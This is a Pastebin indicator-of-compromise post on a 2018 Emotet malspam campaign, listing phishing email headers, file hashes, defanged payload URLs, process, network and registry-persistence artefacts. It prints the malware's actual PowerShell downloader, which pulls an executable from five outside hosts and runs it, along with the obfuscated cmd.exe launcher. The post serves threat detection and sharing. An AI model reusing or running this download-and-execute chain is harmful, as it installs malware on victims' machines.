SHARE
TWEET

#emolet_011018

VRad Oct 1st, 2018 (edited) 201 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #Emotet #W97M #Macro #powershell
  2.  
  3. https://pastebin.com/Y6DnbpHv
  4.  
  5. email_headers
  6. --------------
  7. #1
  8. Received: from a27-50.smtp-out.us-west-2.amazonses{.} com (a27-50.smtp-out.us-west-2.amazonses{.} com [54.240.27.50])
  9.     by mailsrv.victim{.} com (8.15.2/8.15.2) with ESMTP id w918l0k9089312
  10.     for <user1@victim{.} com>; Mon, 1 Oct 2018 11:47:00 +0300 (EEST)
  11.     (envelope-from 010101662ecf0227-5c3272a9-ff0e-4f05-9508-b53355b30f17-000000@us-west-2.amazonses{.} com)
  12. Date: Mon, 1 Oct 2018 08:46:50 +0000
  13. From: Интернет-магазин С торгом <ar@champlungmaslegian{.} com>
  14. To: user1@victim{.} com
  15. Subject: Invoice from Интернет-магазин С торгом
  16.  
  17. #2
  18. Received-PRA: pass ;
  19. Received-SPF: pass ;
  20. Received: from mail.btconnect{.} com (rdslmr.btconnect{.} com [62.239.164.79]) by mail2.victim2{.} com with smtp id 70c8_00a5_2d799447_045b_463e_aea7_60b44e018a09;
  21.     Mon, 01 Oct 2018 11:46:29 +0300
  22. Received: from mail.btconnect{.} com (rd11780omr12.iuser.iroot.adidom{.} com [10.187.89.173])
  23.     by rd11780slr11.dci.bt{.} com (MOS 4.4.8-GA)
  24.     with ESMTP id AMS19190;
  25.     Mon, 1 Oct 2018 09:46:27 +0100
  26. Received: (from localhost [127.0.0.1])
  27.     by rd11780omr12.dci.bt{.} com (MOS 4.4.8-GA)
  28.     id QYL41356;
  29.     Mon,  1 Oct 2018 09:46:27 +0100 (BST)
  30. Received: from router-heim.i-netpartner.net (EHLO 10.5.21.12) ([217.23.56.98])
  31.     by rd11780omr12.dci.bt{.} com
  32.     with ESMTP id QYL41299 (AUTH parkhillvets@btconnect{.} com);
  33.     Mon, 01 Oct 2018 09:46:26 +0100 (BST)
  34. Date: Mon, 01 Oct 2018 10:46:26 +0100
  35. From: Ващенко Інна <inna@razumkov.org.ua> <parkhillvets@btconnect{.} com>
  36. To: user2@victim2
  37. Subject: Invoice from Ващенко Інна
  38.  
  39. files
  40. --------------
  41. SHA-256 84803f2f3f575a5cb48fd7eabd9b0e8e73776b2fd8f3b3e098c8709d282c7fd7
  42. File name   FILE_58873.doc
  43. File size   66.63 KB
  44.  
  45. SHA-256 fe516708fe6db062b525795e67100e846257135e5a30526839ed405bf05ed4a5
  46. File name   U5CUyRF7hzz.exe
  47. File size   184 KB
  48.  
  49. h11p: \gidamikrobiyoloji{.} com/IBfAlRX
  50. h11p: \madisonda{.} com/BacOqsvFqz
  51. h11p: \motiondev{.} com{.} br/1cTvBSu2P
  52. h11p: \fluorescent{.} cc/KxcY1d6R
  53. h11p: \kristianmarlow{.} com/Sy5IRFsRU9
  54.  
  55. powershell $Knq=new-object Net.WebClient;$ibh='h11p: \gidamikrobiyoloji{.} com/IBfAlRX@h11p: \madisonda{.} com/BacOqsvFqz@h11p: \motiondev{.} com{.} br/1cTvBSu2P@h11p: \fluorescent{.} cc/KxcY1d6R@h11p: \kristianmarlow{.} com/Sy5IRFsRU9'.Split('@');$tFI = '992';$KMF=$env:public+'\'+$tFI+'.exe';foreach($HAE in $ibh){try{$Knq.DownloadFile($HAE, $KMF);Invoke-Item $KMF;break;}catch{}}
  56.  
  57. activity
  58. **************
  59.  
  60. proc
  61. --------------
  62. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  63. C:\Windows\SysWOW64\CMd.exe  /V/C"^s^e^t ^B^J^1=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}{^hc^t^ac}^;^k^a^er^b^;^F^M^K^$^ ^m^e^t^I-^e^k^ovn^I^;)^F^M^K^$^ ,E^A^H^$(^e^l^i^F^d^a^o^ln^w^o^D^.^qn^K^$^{^yrt^{)h^b^i^$^ n^i^ ^E^A^H^$(^hc^a^er^of^;^'^e^x^e^.^......
  64. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  $Knq=new-object Net.WebClient;$ibh='h11p: \gidamikrobiyoloji{.} com/IBfAlRX@h11p: \madisonda{.} com/BacOqsvFqz@h11p: \motiondev{.} com{.} br/1cTvBSu2P@h11p: \fluorescent{.} cc/KxcY1d6R@h11p: \kristianmarlow{.} com/Sy5IRFsRU9'.Split('@');$tFI = '992';$KMF=$env:public+'\'+$tFI+'.exe';foreach($HAE in $ibh){try{$Knq.DownloadFile($HAE, $KMF);Invoke-Item $KMF;break;}catch{}}                
  65. "C:\Users\Public\992.exe"
  66. "C:\Users\operator\AppData\Local\Microsoft\Windows\xpathcab.exe"
  67.  
  68. netwrk
  69. --------------
  70. 185.179.26.24   gidamikrobiyoloji{.} com    GET /IBfAlRX/ HTTP/1.1  no User Agent  
  71. "190.2.50.193","190.2.50.193:443","GET / HTTP/1.1 ","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
  72.  
  73. comp
  74. --------------
  75. powershell.exe  1556    185.179.26.24   80  ESTABLISHED
  76. xpathcab.exe    3720    190.215.241.14  8080    SYN_SENT                                       
  77. xpathcab.exe    3720    190.2.50.193    443 SYN_SENT   
  78.  
  79. persist
  80. --------------
  81. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              01.10.2018 14:22   
  82. xpathcab            c:\users\operator\appdata\local\microsoft\windows\xpathcab.exe  01.10.2018 13:00
  83.  
  84. # # #
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top